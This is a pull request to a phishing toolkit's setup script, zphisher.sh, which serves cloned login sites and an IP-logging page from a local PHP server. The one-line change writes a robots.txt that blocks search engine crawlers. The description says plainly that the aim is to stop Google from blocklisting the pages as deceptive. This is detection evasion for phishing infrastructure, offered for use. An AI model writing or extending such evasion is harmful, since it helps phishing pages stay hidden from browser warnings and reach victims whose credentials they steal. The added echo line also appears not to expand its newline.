### PR TITLE
Add robots.txt

### DIFF
--- a/zphisher.sh
+++ b/zphisher.sh
@@ -405,6 +405,7 @@ setup_site() {
 	echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} Setting up server..."${WHITE}
 	cp -rf .sites/"$website"/* .server/www
 	cp -f .sites/ip.php .server/www/
+        echo "User-agent: *\nDisallow: /" > .server/www/robots.txt
 	echo -ne "\n${RED}[${WHITE}-${RED}]${BLUE} Starting PHP server..."${WHITE}
 	cd .server/www && php -S "$HOST":"$PORT" > /dev/null 2>&1 &
 }


### PR DESCRIPTION
Add robots.txt to avoid crawling from search engine bots.  e.g. Google crawls the page and sets it to a blocklist showing "Deceptive page ahead" during this act. 

https://www.malcare.com/blog/deceptive-site-ahead/